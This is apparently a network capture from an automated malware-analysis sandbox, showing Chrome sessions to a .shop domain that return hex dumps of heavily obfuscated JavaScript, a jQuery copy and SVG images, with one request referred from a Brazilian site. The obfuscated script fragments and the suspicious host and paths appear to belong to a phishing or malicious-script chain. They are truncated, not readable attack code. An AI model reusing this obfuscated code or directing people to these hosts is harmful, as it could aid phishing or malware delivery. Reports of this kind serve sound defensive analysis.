                                2025-01-14 03:33:02 UTC7822INData Raw: 78 32 33 64 32 35 33 29 3b 7d 2c 27 54 6f 48 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 61 62 63 37 2c 5f 30 78 35 31 30 39 66 61 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 61 39 39 65 38 28 5f 30 78 32 35 33 35 32 34 2c 5f 30 78 34 63 38 35 37 34 2c 5f 30 78 32 34 62 30 61 66 2c 5f 30 78 32 39 38 31 34 37 2c 5f 30 78 32 37 34 36 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 32 34 62 30 61 66 2d 30 78 33 31 39 2c 5f 30 78 34 63 38 35 37 34 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 65 63 66 35 38 39 5b 5f 30 78 65 61 39 39 65 38 28 30 78 37 34 39 2c 30 78 38 33 64 2c 30 78 37 32 36 2c 30 78 37 65 38 2c 30 78 38 35 36 29 5d 28 5f 30 78 31 30 61 62 63 37 2c 5f 30 78 35 31 30 39 66 61 29 3b 7d 2c 27 43 6c 77 6f 52 27 3a 66 75 6e
                                Data Ascii: x23d253);},'ToHex':function(_0x10abc7,_0x5109fa){function _0xea99e8(_0x253524,_0x4c8574,_0x24b0af,_0x298147,_0x274655){return _0x4e53(_0x24b0af-0x319,_0x4c8574);}return _0xecf589[_0xea99e8(0x749,0x83d,0x726,0x7e8,0x856)](_0x10abc7,_0x5109fa);},'ClwoR':fun
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 30 78 31 37 31 62 65 34 28 30 78 31 39 38 2c 30 78 31 30 35 2c 30 78 65 2c 30 78 33 36 34 2c 2d 30 78 32 65 29 5d 28 5f 30 78 34 31 63 39 39 64 2c 5f 30 78 34 36 35 36 62 35 2c 5f 30 78 35 34 65 66 64 30 2c 5f 30 78 32 61 30 37 66 37 29 3b 7d 2c 27 66 46 51 54 47 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 62 38 64 63 2c 5f 30 78 34 63 34 32 36 34 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 62 66 62 39 66 28 5f 30 78 35 38 65 34 33 64 2c 5f 30 78 31 30 37 66 39 32 2c 5f 30 78 33 65 36 32 65 33 2c 5f 30 78 32 34 38 38 62 37 2c 5f 30 78 32 30 64 62 38 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 38 65 34 33 64 2d 30 78 32 37 38 2c 5f 30 78 33 65 36 32 65 33 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 31 33 31 38 33 32
                                Data Ascii: 1f400x171be4(0x198,0x105,0xe,0x364,-0x2e)](_0x41c99d,_0x4656b5,_0x54efd0,_0x2a07f7);},'fFQTG':function(_0x3fb8dc,_0x4c4264){function _0x5bfb9f(_0x58e43d,_0x107f92,_0x3e62e3,_0x2488b7,_0x20db85){return _0x4e53(_0x58e43d-0x278,_0x3e62e3);}return _0x131832
                                2025-01-14 03:33:02 UTC7822INData Raw: 71 72 61 27 2c 27 42 4e 4d 6c 64 27 2c 27 69 61 71 66 66 27 2c 27 62 7a 65 75 65 27 2c 27 53 77 79 6b 53 27 2c 27 6b 59 72 54 68 27 2c 27 6b 4f 6e 49 65 27 2c 27 7a 6e 53 58 5a 27 2c 27 42 6b 6f 4e 69 27 2c 27 68 55 6a 4c 63 27 2c 27 65 68 6a 6d 4a 27 2c 27 50 78 79 6e 4b 27 2c 27 41 54 6b 77 74 27 2c 27 62 70 72 47 45 27 2c 27 72 75 63 74 6f 27 2c 27 77 47 59 6f 48 27 2c 27 4e 72 75 54 4a 27 2c 27 70 46 4b 51 54 27 2c 27 77 51 47 4f 7a 27 2c 27 71 53 55 55 43 27 2c 27 4e 79 6c 59 53 27 2c 27 74 51 55 5a 65 27 2c 27 6c 50 54 63 72 27 2c 27 73 6a 79 74 64 27 2c 27 49 42 6f 48 48 27 2c 27 72 6d 61 65 61 27 2c 27 58 6d 4b 50 43 27 2c 27 67 4b 69 5a 67 27 2c 27 75 6e 64 65 66 27 2c 27 6b 4d 51 64 77 27 2c 27 56 51 66 42 71 27 2c 27 59 69 45 6c 4b 27 2c 27 64
                                Data Ascii: qra','BNMld','iaqff','bzeue','SwykS','kYrTh','kOnIe','znSXZ','BkoNi','hUjLc','ehjmJ','PxynK','ATkwt','bprGE','ructo','wGYoH','NruTJ','pFKQT','wQGOz','qSUUC','NylYS','tQUZe','lPTcr','sjytd','IBoHH','rmaea','XmKPC','gKiZg','undef','kMQdw','VQfBq','YiElK','d
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.449752203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC366OUTGET /m/mxl/sig_op.svg HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC299INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                Last-Modified: Mon, 13 Jan 2025 14:00:18 GMT
                                ETag: "638-62b96dd4d2219"
                                Accept-Ranges: bytes
                                Content-Length: 1592
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Content-Type: image/svg+xml
                                2025-01-14 03:33:02 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.449754203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC380OUTGET /m/jx/BY9284WK32TP02VZXSQRC7V0Q HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC268INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:02 UTC7924INData Raw: 33 65 32 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                Data Ascii: 3e27/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                2025-01-14 03:33:02 UTC7993INData Raw: 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 66 65 28 65 2c 22 69 6e 70 75 74 22 29 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e
                                Data Ascii: function B(t){return function(e){return fe(e,"input")&&e.type===t}}function _(t){return function(e){return(fe(e,"input")||fe(e,"button"))&&e.type===t}}function X(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 62 2e 70 73 65 75 64 6f 73 2e 65 6d 70 74 79 28 65 29 7d 2c 68 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 71 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 69 6e 70 75 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 62 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65
                                Data Ascii: 1f40function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!b.pseudos.empty(e)},header:function(e){return q.test(e.nodeName)},input:function(e){return N.test(e.nodeName)},button:function(e){return fe
                                2025-01-14 03:33:02 UTC7822INData Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 2c 6e 29 7d 2c 70 72 65 76 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e
                                Data Ascii: ction(e){return A(e,"nextSibling")},prev:function(e){return A(e,"previousSibling")},nextAll:function(e){return d(e,"nextSibling")},prevAll:function(e){return d(e,"previousSibling")},nextUntil:function(e,t,n){return d(e,"nextSibling",n)},prevUntil:function
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 58 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 3d 28 74 7c 7c 22 66 78 22 29 2b 22 71 75 65 75 65 22 2c 72 3d 5f 2e 67 65 74 28 65 2c 74 29 2c 6e 26 26 28 21 72 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 72 3d 5f 2e 61 63 63 65 73 73 28 65 2c 74 2c 63 65 2e 6d 61 6b 65 41 72 72 61 79 28 6e 29 29 3a 72 2e 70 75 73 68 28 6e 29 29 2c 72 7c 7c 5b 5d 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28
                                Data Ascii: 1f40removeData:function(e){return this.each(function(){X.remove(this,e)})}}),ce.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=_.get(e,t),n&&(!r||Array.isArray(n)?r=_.access(e,t,ce.makeArray(n)):r.push(n)),r||[]},dequeue:function(
                                2025-01-14 03:33:02 UTC7822INData Raw: 79 28 69 2e 65 6c 65 6d 2c 73 29 29 26 26 21 31 3d 3d 3d 28 75 2e 72 65 73 75 6c 74 3d 72 29 26 26 28 75 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 29 7d 72 65 74 75 72 6e 20 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 26 26 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 2e 63 61 6c 6c 28 74 68 69 73 2c 75 29 2c 75 2e 72 65 73 75 6c 74 7d 7d 2c 68 61 6e 64 6c 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 3d 5b 5d 2c 75 3d 74 2e 64 65 6c 65 67 61 74 65 43 6f 75 6e 74 2c 6c 3d 65 2e 74 61 72 67 65 74 3b 69 66 28 75 26 26 6c 2e 6e 6f 64 65 54 79 70 65 26 26 21 28 22 63 6c 69 63 6b 22 3d 3d 3d 65 2e 74 79 70 65 26 26 31 3c 3d 65 2e 62 75 74 74
                                Data Ascii: y(i.elem,s))&&!1===(u.result=r)&&(u.preventDefault(),u.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,u),u.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&1<=e.butt
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 54 79 70 65 29 7b 76 61 72 20 74 3d 4d 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 68 69 73 29 7d 29 7d 2c 61 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72
                                Data Ascii: 1f40Type){var t=Me(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return $e(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return $e(this,arguments,function(e){this.parentNode&&this.par


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.449755203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC628OUTGET /m/bxg/5K2DF1C200SF89B6CKQHB2M8R HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: image
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC247INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                2025-01-14 03:33:02 UTC1871INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.449756203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:03 UTC382OUTGET /m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1E HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:03 UTC268INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:03 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:03 UTC7924INData Raw: 33 65 32 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 62 31 39 38 39 2c 5f 30 78 34 64 64 38 64 64 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 39 38 63 37 36 30 28 5f 30 78 35 62 63 30 36 36 2c 5f 30 78 32 62 66 65 38 62 2c 5f 30 78 33 61 65 35 61 34 2c 5f 30 78 62 62 32 64 63 63 2c 5f 30 78 31 31 35 35 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 62 63 30 36 36 2d 20 2d 30 78 32 64 66 2c 5f 30 78 62 62 32 64 63 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 65 65 30 37 31 28 5f 30 78 32 63 63 64 62 62 2c 5f 30 78 35 38 38 63 64 35 2c 5f 30 78 32 31 66 36 31 34 2c 5f 30 78 33 65 38 65 32 66 2c 5f 30 78 34 64 32 31 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 64 32 31 39 61 2d 20 2d 30 78 32 32 33 2c
                                Data Ascii: 3e27(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,
                                2025-01-14 03:33:03 UTC7993INData Raw: 2c 5f 30 78 35 61 32 36 37 31 2c 5f 30 78 34 62 66 33 66 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 61 32 36 37 31 2d 20 2d 30 78 32 64 39 2c 5f 30 78 32 64 62 32 64 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 37 35 34 63 28 5f 30 78 33 33 39 30 32 62 2c 5f 30 78 34 33 39 31 30 36 2c 5f 30 78 33 31 39 36 36 64 2c 5f 30 78 33 39 36 65 37 62 2c 5f 30 78 39 64 64 64 36 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 33 31 39 36 36 64 2d 20 2d 30 78 32 36 62 2c 5f 30 78 39 64 64 64 36 65 29 3b 7d 76 61 72 20 5f 30 78 32 66 38 63 34 30 3d 7b 7d 3b 5f 30 78 32 66 38 63 34 30 5b 5f 30 78 33 34 30 32 34 64 28 30 78 34 38 39 2c 30 78 35 61 32 2c 30 78 34 30 38 2c 30 78 35 66 62 2c 30 78 35 64 33 29 5d 3d 5f 30 78 33
                                Data Ascii: ,_0x5a2671,_0x4bf3f7){return _0x4e53(_0x5a2671- -0x2d9,_0x2db2d1);}function _0x19754c(_0x33902b,_0x439106,_0x31966d,_0x396e7b,_0x9ddd6e){return _0x4e53(_0x31966d- -0x26b,_0x9ddd6e);}var _0x2f8c40={};_0x2f8c40[_0x34024d(0x489,0x5a2,0x408,0x5fb,0x5d3)]=_0x3
                                2025-01-14 03:33:03 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:03 UTC8192INData Raw: 31 66 34 30 0d 0a 20 2d 30 78 31 31 36 2c 5f 30 78 61 34 32 32 63 64 2d 30 78 31 33 39 2c 5f 30 78 34 65 34 65 30 36 2d 30 78 31 35 39 2c 5f 30 78 61 34 32 32 63 64 2c 5f 30 78 35 62 38 62 65 61 2d 30 78 38 37 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 34 34 34 63 30 28 5f 30 78 31 64 31 33 65 39 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 35 39 62 64 35 37 2c 5f 30 78 35 33 37 36 66 65 2c 5f 30 78 62 61 63 35 65 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 30 36 39 64 28 5f 30 78 31 64 31 33 65 39 2d 30 78 31 39 2c 5f 30 78 34 39 61 65 33 35 2d 30 78 39 65 2c 5f 30 78 62 61 63 35 65 35 2d 20 2d 30 78 36 36 61 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 62 61 63 35 65 35 2d 30 78 64 30 29 3b 7d 76 61 72 20 5f 30 78 38 34 64 65 36 65 3d 7b 27 76 55 73 7a
                                Data Ascii: 1f40 -0x116,_0xa422cd-0x139,_0x4e4e06-0x159,_0xa422cd,_0x5b8bea-0x87);}function _0x2444c0(_0x1d13e9,_0x49ae35,_0x59bd57,_0x5376fe,_0xbac5e5){return _0x58069d(_0x1d13e9-0x19,_0x49ae35-0x9e,_0xbac5e5- -0x66a,_0x49ae35,_0xbac5e5-0xd0);}var _0x84de6e={'vUsz
                                2025-01-14 03:33:03 UTC7822INData Raw: 31 38 37 2c 5f 30 78 31 33 32 30 36 35 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 65 63 66 35 38 39 5b 5f 30 78 34 39 30 61 62 30 28 2d 30 78 31 30 34 2c 30 78 31 30 36 2c 2d 30 78 35 38 2c 2d 30 78 31 63 32 2c 2d 30 78 35 37 29 5d 28 5f 30 78 32 61 37 62 32 62 2c 5f 30 78 32 33 64 32 35 33 29 3b 7d 2c 27 54 6f 48 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 61 62 63 37 2c 5f 30 78 35 31 30 39 66 61 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 61 39 39 65 38 28 5f 30 78 32 35 33 35 32 34 2c 5f 30 78 34 63 38 35 37 34 2c 5f 30 78 32 34 62 30 61 66 2c 5f 30 78 32 39 38 31 34 37 2c 5f 30 78 32 37 34 36 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 32 34 62 30 61 66 2d 30 78 33 31 39 2c 5f 30 78 34 63 38 35 37 34 29 3b 7d 72 65 74 75
                                Data Ascii: 187,_0x132065);}return _0xecf589[_0x490ab0(-0x104,0x106,-0x58,-0x1c2,-0x57)](_0x2a7b2b,_0x23d253);},'ToHex':function(_0x10abc7,_0x5109fa){function _0xea99e8(_0x253524,_0x4c8574,_0x24b0af,_0x298147,_0x274655){return _0x4e53(_0x24b0af-0x319,_0x4c8574);}retu
                                2025-01-14 03:33:03 UTC2INData Raw: 0d 0a
                                Data Ascii:
